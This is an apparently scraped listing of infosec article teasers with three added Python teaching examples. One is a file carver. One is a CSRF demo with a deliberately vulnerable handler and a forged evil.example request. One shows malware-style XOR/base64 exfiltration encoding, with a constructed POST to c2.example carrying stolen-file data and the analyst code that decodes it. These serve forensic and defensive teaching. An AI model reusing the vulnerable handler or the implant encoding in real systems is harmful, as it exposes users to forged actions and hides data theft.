File carving is a process used in computer forensics to extract data from a disk drive or other storage device without the assistance of the file system that originally created the file. It recovers files from unallocated space using no file-system metadata at all, only the content of the bytes themselves, and is used […]
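The principle behind header/footer carving, as an added Python example that is not part of the original article: the carver scans raw bytes for known file signatures and cuts out everything up to the matching footer, never consulting a file system. The signature table is a small constructed subset, and the "disk image" is built inline from filler bytes, a JPEG, a PNG, and a JPEG whose footer is missing, so the truncated case is exercised too.

```python
from collections import namedtuple

# Header/footer signatures for a few formats (a constructed subset, not an exhaustive table).
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82"),
    "pdf": (b"%PDF-", b"%%EOF"),
}

Carved = namedtuple("Carved", "ftype offset data complete")


def carve(image: bytes, signatures=SIGNATURES, max_size: int = 10 * 1024 * 1024):
    """Header/footer carving over raw bytes; no file-system metadata is consulted.

    For every occurrence of a known header, take bytes up to and including the
    next matching footer. If no footer is found within max_size bytes, emit a
    truncated chunk flagged complete=False rather than silently dropping it.
    Results are sorted by offset in the image.
    """
    results = []
    for ftype, (header, footer) in signatures.items():
        pos = 0
        while True:
            start = image.find(header, pos)
            if start == -1:
                break
            limit = min(len(image), start + max_size)
            end = image.find(footer, start + len(header), limit)
            if end == -1:
                results.append(Carved(ftype, start, image[start:limit], False))
                pos = start + len(header)   # keep scanning past this header
            else:
                end += len(footer)
                results.append(Carved(ftype, start, image[start:end], True))
                pos = end
    results.sort(key=lambda r: r.offset)
    return results


def build_sample_image() -> bytes:
    """Constructed stand-in for unallocated space: filler bytes around a JPEG,
    a PNG, and a JPEG whose footer was never written (e.g. an interrupted copy)."""
    def filler(n):
        # Deterministic non-random filler that contains none of the signatures above.
        return bytes((i * 37 + 11) & 0xFF for i in range(n))
    jpg = b"\xff\xd8\xff\xe0" + b"JFIF-payload" * 3 + b"\xff\xd9"          # 42 bytes
    png = b"\x89PNG\r\n\x1a\n" + b"IHDR-chunk" + b"IEND\xae\x42\x60\x82"   # 26 bytes
    truncated_jpg = b"\xff\xd8\xff\xe1" + b"Exif-but-no-EOI"
    return filler(64) + jpg + filler(100) + png + filler(30) + truncated_jpg


if __name__ == "__main__":
    for c in carve(build_sample_image()):
        state = "complete" if c.complete else "TRUNCATED"
        print(f"{c.ftype} @ offset {c.offset}: {len(c.data)} bytes ({state})")
```

Two caveats a practitioner should keep in mind: a JPEG that embeds a thumbnail contains a second EOI marker, so a pure header/footer carver can stop early and recover only the thumbnail, and a file stored in non-contiguous clusters is not reassembled by this method at all. Production carvers add format-specific validation and fragment handling on top of this basic scan.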
This article illustrates the theory and principles behind C++/CLI programming in a .NET CLR context. We shall investigate the remarkable features of C++/CLI, for instance its advantages over native C++ in a CLR context. We'll run through the basic mechanism to create and execute CLR console and […]
For Part I of these series, please visit this page: http://resources.infosecinstitute.com/windows-systems-and-artifacts-in-digital-forensics-part-i-registry/
This article begins with event logs and discusses their headers’ structure and the structure of their building blocks—the headers of the event records. It mentions some open source tools that can parse event logs and briefly explores event logs […]
Cross-Site Request Forgery (CSRF) is one of the OWASP Top 10 vulnerabilities. It exploits the website's trust in the user's browser. It harms users: an attacker can modify or delete a user's data by making the user's own browser perform the action. The advantage of the attack is that the action is performed as a valid […]
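To make that trust relationship concrete, here is an added Python example (not code from the original article) that simulates a photo-deletion endpoint twice: once trusting the session cookie alone, and once also requiring a per-session synchronizer token and checking the Origin header. The site origin, session store, user data and the attacker's forged request are all constructed stand-ins for what a real web framework and browser would supply.

```python
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://photos.example"   # assumed origin of the site being attacked
SESSIONS = {}                             # session id -> session data (stand-in store)
USER_DATA = {}                            # user -> list of photos (stand-in store)


@dataclass
class Request:
    """Only the parts of an HTTP POST that matter for this demonstration."""
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def login(user: str) -> str:
    """Issue a session cookie plus a per-session CSRF token the site embeds in its own forms."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def delete_photo_vulnerable(req: Request) -> str:
    """Trusts the session cookie alone. The browser attaches that cookie to any
    POST aimed at this site, including one submitted from an attacker's page."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if sess is None:
        return "401 not logged in"
    USER_DATA[sess["user"]].remove(req.form["photo"])
    return "200 deleted"


def delete_photo_hardened(req: Request) -> str:
    """Same action, but the request must also prove it came from the site's own page."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if sess is None:
        return "401 not logged in"
    # Synchronizer token: another origin cannot read it out of our page, so it
    # cannot be forged. Constant-time compare avoids leaking it byte by byte.
    if not hmac.compare_digest(req.form.get("csrf_token", ""), sess["csrf_token"]):
        return "403 missing or bad csrf token"
    # Defence in depth: browsers set Origin on cross-site POSTs and page scripts cannot override it.
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-site origin"
    USER_DATA[sess["user"]].remove(req.form["photo"])
    return "200 deleted"


def simulate_attack(handler):
    """alice logs in, then visits evil.example, whose hidden auto-submitting form
    POSTs photo=photo1 to our site. The browser adds alice's cookie by itself;
    the form fields and the Origin header come from the attacker's page."""
    USER_DATA["alice"] = ["photo1", "photo2"]
    sid = login("alice")
    forged = Request(cookies={"session": sid},
                     form={"photo": "photo1"},
                     headers={"Origin": "https://evil.example"})
    return handler(forged), list(USER_DATA["alice"])


def simulate_legitimate(handler):
    """alice submits the site's own delete form, which carries her token."""
    USER_DATA["alice"] = ["photo1", "photo2"]
    sid = login("alice")
    genuine = Request(cookies={"session": sid},
                      form={"photo": "photo1", "csrf_token": SESSIONS[sid]["csrf_token"]},
                      headers={"Origin": SITE_ORIGIN})
    return handler(genuine), list(USER_DATA["alice"])


if __name__ == "__main__":
    print("vulnerable, forged :", simulate_attack(delete_photo_vulnerable))
    print("hardened, forged   :", simulate_attack(delete_photo_hardened))
    print("hardened, genuine  :", simulate_legitimate(delete_photo_hardened))
```

The forged request is accepted by the vulnerable handler because nothing in it distinguishes the attacker's form from the site's own; the hardened handler rejects it because the attacker cannot obtain the token, and the Origin check catches the case where a token leaks by some other route.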
Learning about artifacts in Windows is crucial for digital forensics examiners, as Windows accounts for most of the traffic in the world (91.8% of traffic came from computers running Windows as their operating system as of 2013), so examiners will most likely encounter Windows and will have to collect […]
The purpose of this article is to show how to bypass various security checks by modifying binary code directly, rather than source code, using CFF Explorer. We have already looked at diverse ways of circumventing IL code earlier; there we accomplished such crucial tasks […]
In this article we are going to learn how to configure the ProFTPD service on a CentOS machine. After that we will conduct a penetration test to evaluate the security of the FTP service, and then we will learn the countermeasures for the vulnerabilities found.
Installation and Configuration of FTP Service on CentOS Linux […]
Helix3 is a live CD for computer forensic investigation and incident response. It is built on top of Ubuntu and comes in both free and commercial forms. This article covers working with the free Helix Live CD. You can download the live CD from: https://www.e-fense.com/store/index.php?_a=viewProd&productId=11
I am currently […]
Over the years, we have learned innumerable ways of consuming services across the network, such as Remoting, COM, COM+, MSMQ, Web Services using ASP.NET, and DCOM. Every technology has its advantages and disadvantages. This article commences by framing the need for WCF and examining the problems it was intended to […]
This is a continuation of the first article on the SANS Investigative Forensic Toolkit (SIFT). In this article we cover the rest of the tools listed at the start of the first article.
Maltego is an open source intelligence gathering and forensics tool. It provides a library of transforms for […]
The SANS Investigative Forensic Toolkit (SIFT) is an interesting toolkit created by the SANS forensics team and made available publicly and freely to the whole community. It comes with a set of preconfigured tools for performing digital forensic investigations. It is based on Ubuntu and has a long […]
Any good piece of malware eventually has to phone home: what good is collecting your dirty little secrets if it can't capitalize on them? This article demonstrates how a little forensic analysis can help you visualize where your data is going.
Web site access logs are […]
Volatility is one of the best open source programs for analyzing RAM dumps from 32-bit and 64-bit systems. It supports analysis of Linux, Windows, Mac, and Android memory. It is written in Python and runs on Windows, Linux, and Mac systems. It can analyze raw dumps, crash […]
Google Chrome is the most popular web browser in the world. It is lightweight and comes with a clean interface, which is the main reason for its popularity. It also has various other features that make browsing easier and faster. Like Firefox, Chrome also supports add-ons, but they are called […]
This article commences with a brief backward glimpse at COM, then compares it with the way components interact in .NET, and finally looks at the tool provided by Microsoft to let these two technologies work together. Essentially, COM is the antecedent technology to .NET. […]
Botnet-related threats have spread widely across the web recently. When we talk about botnets, a botnet is basically a collection of infected machines running bot code that are linked to each other through some communication mechanism, through which they receive commands to perform certain actions. These may also […]
Advanced Persistent Threats (APTs), as the name suggests, are advanced and persistent by nature, and they are deadly. An APT can affect any organization at any moment, and security specialists face the ordeal of working through the never-ending maze of APTs.
Security professionals need to employ a wide range […]
The term "multithreaded programming" may sound complicated, but it is quite easy to do in C#/.NET. This article explains how multithreading works on a typical general-purpose computer. You will learn how the operating system manages thread execution and how to use the Thread class in your program to create […]
Assemblies are the core units of deployment. At design time, we can examine the set of referenced assemblies in CIL code with a couple of external tools, Reflector and ildasm, to peek into the underlying metadata, MSIL code, and manifest. Hence, the motivation behind writing this article is to […]
In this article we will see how malware encodes or encrypts the data it exfiltrates from infected machines to the command and control (C2) server. This is often done using a custom encoding or encryption algorithm.
It is becoming increasingly common these days to see malware use this technique to prevent security […]
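One common shape such a custom scheme takes, shown as an added Python example rather than code from the original article or from any particular malware family: the implant XORs the record with a single byte, base64-encodes it with a shuffled alphabet, and sends the result as a POST parameter; the analyst side undoes the alphabet swap and recovers the XOR key from a field name that every record is known to contain. The record layout, the key value, the custom alphabet and the captured request are all constructed for this illustration.

```python
import base64
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Constructed custom alphabet: the standard one rotated by 13 positions.
CUSTOM_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]
TO_CUSTOM = bytes.maketrans(STD_ALPHABET.encode(), CUSTOM_ALPHABET.encode())
FROM_CUSTOM = bytes.maketrans(CUSTOM_ALPHABET.encode(), STD_ALPHABET.encode())

# Constructed sample record and key, standing in for what an implant would send.
SAMPLE_RECORD = b"host=WIN-7-PC;user=bob;file=passwords.txt"
SAMPLE_KEY = 0x5A


def xor1(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key gives the input back."""
    return bytes(b ^ key for b in data)


def malware_encode(record: bytes, key: int) -> bytes:
    """Implant side: XOR, then base64, then swap in the custom alphabet
    ('=' padding is not in the alphabet, so it passes through untouched)."""
    return base64.b64encode(xor1(record, key)).translate(TO_CUSTOM)


def analyst_decode(blob: bytes, key: int) -> bytes:
    """Analyst side with a known key: undo the alphabet swap, base64-decode, XOR."""
    return xor1(base64.b64decode(blob.translate(FROM_CUSTOM)), key)


def recover_key(blob: bytes, known_marker: bytes = b"host="):
    """Known-plaintext key recovery: exfil records usually carry a fixed field
    name, and single-byte XOR is a bijection per key, so only the right key
    makes the marker appear. Returns the key, or None if no key fits."""
    raw = base64.b64decode(blob.translate(FROM_CUSTOM))
    for key in range(256):
        if known_marker in xor1(raw, key):
            return key
    return None


def build_capture() -> bytes:
    """Constructed HTTP POST as it would appear in a packet capture or proxy log."""
    body = b"d=" + malware_encode(SAMPLE_RECORD, SAMPLE_KEY)
    return (b"POST /gate.php HTTP/1.1\r\nHost: c2.example\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


def decode_capture(raw_http: bytes, param: bytes = b"d"):
    """Pull the parameter out of the POST body, recover the key, decode the record."""
    body = raw_http.split(b"\r\n\r\n", 1)[1]
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")   # split on the first '=' only; padding follows
        if name == param:
            key = recover_key(value)
            if key is None:
                return None, b""
            return key, analyst_decode(value, key)
    return None, b""


if __name__ == "__main__":
    key, record = decode_capture(build_capture())
    print(f"recovered key 0x{key:02x}: {record.decode()}")
```

A rolling multi-byte key or RC4 with a hard-coded key breaks the 256-guess search, but the approach is the same: find a field name or other fixed plaintext that every beacon contains, or pull the key straight out of the binary, then decode the captured traffic rather than relying on the custom alphabet to hide it.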